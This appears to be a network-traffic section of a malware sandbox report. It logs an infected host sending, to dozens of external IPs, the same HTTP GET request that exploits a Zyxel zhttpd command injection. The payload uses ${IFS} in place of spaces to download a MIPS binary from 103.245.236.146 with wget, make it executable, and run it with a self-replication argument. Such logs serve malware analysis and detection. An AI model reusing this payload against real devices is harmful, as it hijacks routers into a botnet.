                                                        Jan 28, 2024 10:13:04.629690886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7342192.168.2.1454652104.250.134.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629730940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7343192.168.2.1445212199.17.227.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629770041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7344192.168.2.1455834119.179.135.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629816055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7345192.168.2.1454992107.236.74.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629847050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7346192.168.2.143605295.250.149.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629899025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7347192.168.2.145507238.93.94.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629930973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7348192.168.2.14608801.121.229.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629992008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7349192.168.2.1438076190.158.87.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630036116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7350192.168.2.1442858143.108.82.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630063057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7351192.168.2.1451040173.168.202.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630115986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7352192.168.2.1445782177.88.73.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630155087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7353192.168.2.1448500131.76.166.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630213022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7354192.168.2.1434904168.136.222.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630238056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7355192.168.2.1454234221.150.239.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630273104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7356192.168.2.1446826150.224.101.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630292892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7357192.168.2.14335442.186.124.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630348921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7358192.168.2.1435188145.207.77.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630381107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7359192.168.2.1459496124.106.3.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630444050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7360192.168.2.143340867.255.125.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630455017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7361192.168.2.145638866.0.68.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630515099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7362192.168.2.1435748223.111.106.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630546093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7363192.168.2.1433248123.175.190.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630589962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7364192.168.2.143309224.91.174.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630640984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7365192.168.2.1439732179.20.203.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630664110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7366192.168.2.1450698168.15.68.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630698919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7367192.168.2.144531218.59.113.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630745888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7368192.168.2.14427028.180.17.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630790949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7369192.168.2.1440788188.250.43.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630815983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7370192.168.2.1439922134.28.237.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630847931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7371192.168.2.144006495.71.202.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630909920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7372192.168.2.145110237.44.119.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630939007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7373192.168.2.145726031.63.167.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.630970955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7374192.168.2.1434918199.51.226.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631004095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7375192.168.2.143441024.202.132.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631017923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7376192.168.2.1456714103.117.154.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631073952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7377192.168.2.1446752178.171.93.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631119013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7378192.168.2.145294669.183.16.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631154060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7379192.168.2.144839061.188.54.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631202936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7380192.168.2.143283089.109.104.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631227970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7381192.168.2.1443916207.250.176.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631268978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7382192.168.2.1440060178.166.122.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631315947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7383192.168.2.145623031.218.129.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631351948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7384192.168.2.1448174116.30.9.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631409883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7385192.168.2.144968091.73.239.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631443977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7386192.168.2.143474661.135.77.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631480932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7387192.168.2.143466257.48.55.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631510973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7388192.168.2.1453422150.21.224.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631550074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7389192.168.2.1447410106.108.144.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631609917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7390192.168.2.1439050182.237.18.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631632090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7391192.168.2.1450236186.40.39.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631688118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7392192.168.2.143493647.88.215.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631714106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7393192.168.2.1432840201.6.9.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631756067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7394192.168.2.145206620.198.239.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631783009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7395192.168.2.1454430141.115.77.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631856918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7396192.168.2.14533782.180.46.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631875992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7397192.168.2.145770870.235.193.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631912947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7398192.168.2.1433592217.99.152.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631932020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7399192.168.2.145458491.75.245.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.631999016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7400192.168.2.144117619.78.61.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632030964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7401192.168.2.1435492217.84.177.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632078886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7402192.168.2.1439354111.86.110.195443
                                                        TimestampBytes transferredDirectionData
